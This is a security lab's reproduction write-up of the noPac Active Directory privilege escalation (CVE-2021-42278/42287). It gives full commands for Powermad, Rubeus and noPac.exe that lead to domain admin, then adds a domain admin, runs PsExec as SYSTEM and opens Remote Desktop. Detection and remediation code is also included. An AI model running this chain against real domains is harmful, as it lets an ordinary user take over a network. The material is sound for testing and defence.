CVE-2021-42287/CVE-2021-42278 Intra-domain Privilege Escalation

2021-12-21 16:09:28

Friday Lab

Reading notice

Friday Lab's technical articles are provided for reference only. The information in this article is intended solely for security personnel to test or maintain the websites, servers and other systems (including but not limited to these) they are responsible for. Do not use the technical material in this article to intrude on any computer system without authorization. The user alone is responsible for any direct or indirect consequences and losses caused by using the information provided here.

Friday Lab reserves the right to modify, delete and interpret this article. Anyone reposting or distributing it must keep the article intact; it may not be used for other purposes without authorization.

01 Background and affected versions

Background

On 9 November 2021, a researcher abroad announced two Active Directory CVEs on Twitter, CVE-2021-42278 and CVE-2021-42287. Chained together, the two vulnerabilities let an ordinary domain user escalate to Domain Admin privileges.

Affected versions

CVE-2021-42287:

  • Windows Server 2012 R2 (Server Core installation)
  • Windows Server 2012 R2
  • Windows Server 2012 (Server Core installation)
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
  • Windows Server 2012
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2016 (Server Core installation)
  • Windows Server 2016
  • Windows Server, version 20H2 (Server Core Installation)
  • Windows Server, version 2004 (Server Core installation)
  • Windows Server 2022 (Server Core installation)
  • Windows Server 2022
  • Windows Server 2019 (Server Core installation)
  • Windows Server 2019

CVE-2021-42278:

  • Windows Server 2012 R2
  • Windows Server 2012 (Server Core installation)
  • Windows Server 2012
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2016 (Server Core installation)
  • Windows Server 2016
  • Windows Server, version 20H2 (Server Core Installation)
  • Windows Server, version 2004 (Server Core installation)
  • Windows Server 2022 (Server Core installation)
  • Windows Server 2019 (Server Core installation)
  • Windows Server 2022
  • Windows Server 2019
  • Windows Server 2012 R2 (Server Core installation)

02 Vulnerability overview

  • CVE-2021-42278: a machine account's name is normally expected to end with a $ sign, but AD did not validate the names of machine accounts in the domain.
  • CVE-2021-42287, used together with CVE-2021-42278: create a machine account whose name matches the domain controller's machine account but without the trailing $, request a TGT for that account, rename the account, then use S4U2self to request a TGS ticket. In the TGS_REP stage, because the account no longer exists, the DC encrypts the TGS ticket with its own key and supplies a PAC belonging to that account, and we end up with a high-privilege ST.

03 Test environment

Domain controller (Windows Server 2016):

  • Domain: vulntarget.com
  • Account: administrator
  • Password: admin@123
  • Computer name: WIN-UH20PRD3EAO (the system default, never changed)

Domain member (Windows 10):

  • Account: vulntarget.com\win101
  • Password: admin#123

04 Reproduction

Two approaches are used here: requesting the tickets step by step, and using a tool that gets there in two commands.

Requesting the tickets step by step

Add a machine account with Powermad.ps1

Download: https://github.com/Kevin-Robertson/Powermad

```powershell
Import-Module .\Powermad.ps1

New-MachineAccount -MachineAccount eval -Domain vulntarget.com -DomainController WIN-UH20PRD3EAO.vulntarget.com -Verbose
```

Once a domain member has been compromised it is easy to locate the domain controller and obtain its hostname; in msf just run: run post/windows/gather/enum_domain

The execution policy needs to be changed first.

Open PowerShell as administrator (a local administrator account is enough: open cmd as administrator, and at the UAC prompt enter the local administrator's credentials, replacing the domain field with the local machine name). Reference: https://www.jianshu.com/p/a0a88d3bb787

```powershell
Set-ExecutionPolicy RemoteSigned
```

Choose Y when prompted.

Add the account eval and set its password: admin123

```powershell
New-MachineAccount -MachineAccount eval -Domain vulntarget.com -DomainController WIN-UH20PRD3EAO.vulntarget.com -Verbose
```

Clear the SPN information

```powershell
Set-DomainObject "CN=eval,CN=Computers,DC=vulntarget,DC=com" -Clear 'serviceprincipalname' -Verbose
```

Set-DomainObject requires the PowerView module; download it from https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1 (right-click, save, and give it the .ps1 extension).

Reset the machine name

```powershell
# The name to set is the domain controller's, WIN-UH20PRD3EAO, found when locating the DC above; eval is the account just created
Set-MachineAccountAttribute -MachineAccount eval -Value "WIN-UH20PRD3EAO" -Attribute samaccountname -Verbose
```

Request a TGT

```powershell
# The password is the one set when the machine account was created
.\Rubeus.exe asktgt /user:WIN-UH20PRD3EAO /password:admin123 /domain:vulntarget.com /dc:WIN-UH20PRD3EAO.vulntarget.com /nowrap
```

Change the machine account's samaccountname value back

Restore the attribute to its original value:

```powershell
Set-MachineAccountAttribute -MachineAccount eval -Value "eval" -Attribute samaccountname -Verbose
```

Obtain the ticket

Use the TGT just obtained for S4U2self, impersonating the domain admin to request an ST for the domain controller, which ultimately yields control of the DC.

```powershell
.\Rubeus.exe s4u /impersonateuser:Administrator /nowrap /dc:WIN-UH20PRD3EAO.vulntarget.com /self /altservice:LDAP/WIN-UH20PRD3EAO.vulntarget.com /ptt /ticket:[base64 tgt]
```

Checking the ticket

The domain controller still could not be accessed, however. Comparing with noPac's payload showed that noPac uses the cifs service while ldap was used here; changing /altservice:LDAP to /altservice:cifs fixes it.

```powershell
# original:
.\Rubeus.exe s4u /impersonateuser:Administrator /nowrap /dc:WIN-UH20PRD3EAO.vulntarget.com /self /altservice:LDAP/WIN-UH20PRD3EAO.vulntarget.com /ptt /ticket:[base64 tgt]

# with the service changed:
.\Rubeus.exe s4u /impersonateuser:Administrator /nowrap /dc:WIN-UH20PRD3EAO.vulntarget.com /self /altservice:cifs/WIN-UH20PRD3EAO.vulntarget.com /ptt /ticket:[base64 tgt]
```

After the change:

```powershell
.\Rubeus.exe s4u /impersonateuser:Administrator /nowrap /dc:WIN-UH20PRD3EAO.vulntarget.com /self /altservice:cifs/WIN-UH20PRD3EAO.vulntarget.com /ptt /ticket:[base64 tgt]
```
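The sequence carried out above (create a machine account, rename it to the domain controller's name, request the TGT, rename it back) leaves a trace in the domain controller's Security log, which is what a defender should look for. The following function is an added detection example, not code from the original article or from the tools it uses; it assumes event objects with Id, Time and Props fields and runs here over constructed sample events.

```powershell
# Added defensive example (not from the original article): correlate
# Security-log events on a domain controller to spot the noPac pattern.
# Assumed input shape: objects with Id, Time and Props (hashtable of the
# event's EventData fields as found in the Security log).
function Find-NoPacRenames {
    param(
        [Parameter(Mandatory)] [object[]] $Events,
        [Parameter(Mandatory)] [string[]] $DcAccounts   # e.g. 'WIN-UH20PRD3EAO$'
    )
    $dcNames  = @($DcAccounts | ForEach-Object { $_.TrimEnd('$').ToUpperInvariant() })
    $creators = @{}      # sAMAccountName -> who created it (event 4741)
    $findings = @()
    foreach ($e in ($Events | Sort-Object Time)) {
        if ($e.Id -eq 4741) {                 # "A computer account was created"
            $creators[$e.Props.TargetUserName] = $e.Props.SubjectUserName
            continue
        }
        if ($e.Id -ne 4781) { continue }      # "The name of an account was changed"
        $old = $e.Props.OldTargetUserName
        $new = $e.Props.NewTargetUserName
        $who = $e.Props.SubjectUserName
        $origin = if ($creators.ContainsKey($old)) { "created by $($creators[$old])" } else { 'pre-existing' }
        if ($old.EndsWith('$') -and -not $new.EndsWith('$')) {
            # CVE-2021-42278: a computer account lost its trailing dollar sign
            $findings += "$($e.Time) $who renamed computer account $old ($origin) to $new, which has no trailing dollar sign"
        }
        if ($dcNames -contains $new.TrimEnd('$').ToUpperInvariant()) {
            # CVE-2021-42287 setup: the new name collides with a domain controller account
            $findings += "$($e.Time) $who renamed $old to $new, which matches a domain controller account"
        }
    }
    return ,$findings
}

# Constructed sample events mirroring the step-by-step section above
# (eval created by win101, renamed to the DC name, then renamed back).
$sample = @(
    [pscustomobject]@{ Id = 4741; Time = [datetime]'2021-12-13T13:10:00'; Props = @{ TargetUserName = 'eval$'; SubjectUserName = 'win101' } }
    [pscustomobject]@{ Id = 4781; Time = [datetime]'2021-12-13T13:14:00'; Props = @{ OldTargetUserName = 'eval$'; NewTargetUserName = 'WIN-UH20PRD3EAO'; SubjectUserName = 'win101' } }
    [pscustomobject]@{ Id = 4781; Time = [datetime]'2021-12-13T13:16:00'; Props = @{ OldTargetUserName = 'WIN-UH20PRD3EAO'; NewTargetUserName = 'eval'; SubjectUserName = 'win101' } }
)
Find-NoPacRenames -Events $sample -DcAccounts 'WIN-UH20PRD3EAO$'   # two findings, both for the first rename
```

On a real domain controller, build the same objects from Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4741,4781} by reading each record's EventData fields out of its ToXml() output.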

Automated approach

Script: https://github.com/cube0x0/noPac, which you need to compile into an exe yourself.

noPac.exe needs the .NET runtime; download: https://www.microsoft.com/zh-cn/download/confirmation.aspx?id=17718

Run the scan command to check whether the vulnerability is present; it also obtains the domain controller's machine account. The ticket size seen here is 537; a fellow researcher pointed out that if the ticket is larger than 1000, a PAC has been added and the vulnerability is no longer present.

```powershell
# the credentials are those of the Windows 10 domain member
.\noPac.exe scan -domain vulntarget.com -user win101 -pass admin#123
```

The vulnerability is present and a ticket can be obtained. Run the following command to pass the ticket.

```powershell
# this adds a machine account named test with the password admin@123
.\noPac.exe -domain vulntarget.com -user win101 -pass admin#123 /dc WIN-UH20PRD3EAO.vulntarget.com /mAccount test /mPassword QWEasd123 /service cifs /ptt
```
```text
C:\Users\win101\Desktop\Powermad-master>.\noPac.exe -domain vulntarget.com -user win101 -pass admin#123 /dc WIN-UH20PRD3EAO.vulntarget.com /mAccount test /mPassword QWEasd123 /service cifs /ptt
[+] Distinguished Name = CN=test,CN=Computers,DC=vulntarget,DC=com
[+] Machine account test added
[+] Machine account test attribute serviceprincipalname cleared
[+] Machine account test attribute samaccountname updated
[+] Got TGT for WIN-UH20PRD3EAO.vulntarget.com
[+] Machine account test attribute samaccountname updated
[*] Action: S4U

[*] Using domain controller: WIN-UH20PRD3EAO.vulntarget.com (10.0.10.100)
[*] Building S4U2self request for: 'WIN-UH20PRD3EAO@VULNTARGET.COM'
[*] Sending S4U2self request
[+] S4U2self success!
[*] Substituting alternative service name 'cifs/WIN-UH20PRD3EAO.vulntarget.com'
[*] Got a TGS for 'administrator' to 'cifs@VULNTARGET.COM'
[*] base64(ticket.kirbi):

      [base64 ticket omitted]

[+] Ticket successfully imported!
```

An extra machine account, test, now appears on the domain controller.

Add a domain admin account

```cmd
net user admin QWEasd@123 /add /domain
net group "Domain Admins" admin /add /domain
```

Check that the domain admin account was added

```cmd
net group "domain admins" /domain
```

With the domain admin credentials, PsExec64.exe can be used for further actions on the domain controller, such as enabling 3389.

```cmd
PsExec64.exe -u vulntarget\admin -i -p QWEasd@123 -s cmd.exe
```

This uses the domain controller's cmd locally; -s runs it as SYSTEM, otherwise some commands are refused.

At this point 3389 is not yet enabled on the domain controller.

Try to enable 3389 on the domain controller by changing the firewall policy.

```cmd
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
```

Enable Remote Desktop:

```cmd
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
```

Log in with the newly created domain admin credentials:

Account: admin

Password: QWEasd@123

The remote login succeeds.

Other uses are left to the reader.

05 Remediation

  1. Microsoft has released patches KB5008602 and KB5008380; alternatively, update Windows.
  2. Use the ADSI Edit tool on the domain controller to set the AD domain's MAQ (machine account quota) to 0, which breaks the exploitation chain.
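Both remediation items can be checked from PowerShell instead of ADSI Edit, and item 2 can be applied the same way. This audit function is an added example, not code from the original article; it assumes the ActiveDirectory module, read access to the domain, write access to the domain object when -Fix is used, and defaults to the lab domain name from the test environment.

```powershell
# Added audit example (not from the original article). Assumes the
# ActiveDirectory module is installed and the caller can read the domain;
# -Fix additionally needs write access to the domain object.
function Test-NoPacHardening {
    param(
        [string] $Domain = 'vulntarget.com',   # lab domain from the test environment above
        [switch] $Fix                          # set ms-DS-MachineAccountQuota to 0 if it is not
    )
    Import-Module ActiveDirectory -ErrorAction Stop
    $report = [ordered]@{}

    # 1. Machine account quota (remediation item 2): the chain needs an
    #    unprivileged user to be allowed to create a computer object at all.
    $dn  = (Get-ADDomain -Identity $Domain).DistinguishedName
    $maq = (Get-ADObject -Identity $dn -Server $Domain -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'
    if ($maq -gt 0 -and $Fix) {
        Set-ADDomain -Identity $Domain -Replace @{ 'ms-DS-MachineAccountQuota' = 0 }
        $maq = 0
    }
    $report.MachineAccountQuota = $maq

    # 2. CVE-2021-42278 residue: computer objects whose sAMAccountName does
    #    not end in '$', the condition the vulnerability abuses.
    $report.ComputersWithoutDollar = @(
        Get-ADComputer -Server $Domain -LDAPFilter '(!(sAMAccountName=*$))' |
            Select-Object -ExpandProperty DistinguishedName
    )

    # 3. Computer objects created through the quota rather than by an admin:
    #    AD stamps mS-DS-CreatorSID only on those, so each one deserves a look.
    $report.QuotaCreatedComputers = @(
        Get-ADComputer -Server $Domain -LDAPFilter '(mS-DS-CreatorSID=*)' -Properties whenCreated |
            ForEach-Object { "$($_.DistinguishedName) (created $($_.whenCreated))" }
    )

    # 4. Remediation item 1, for the host this runs on (run it on each DC).
    $report.PatchesPresent = @(
        Get-HotFix -ErrorAction SilentlyContinue |
            Where-Object { $_.HotFixID -in 'KB5008602', 'KB5008380' } |
            Select-Object -ExpandProperty HotFixID
    )

    return [pscustomobject]$report
}

Test-NoPacHardening -Domain 'vulntarget.com' | Format-List
```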

Reference:

https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html

FRIDAY LAB

Friday Lab was founded in 2017 and brings together many technical researchers who keep pushing forward on forward-looking research in industrial internet security. It is made up of elite graduates of well-known universities at home and abroad and industry experts from top companies, most of whom come from the internationally leading, nationally renowned hacker team, Zhejiang University's AAA team. As the professional R&D team of Mulian Technology (木链科技), Friday Lab draws on its refined technical expertise to provide new ideas for product development and explore new directions for technical innovation in the industry.
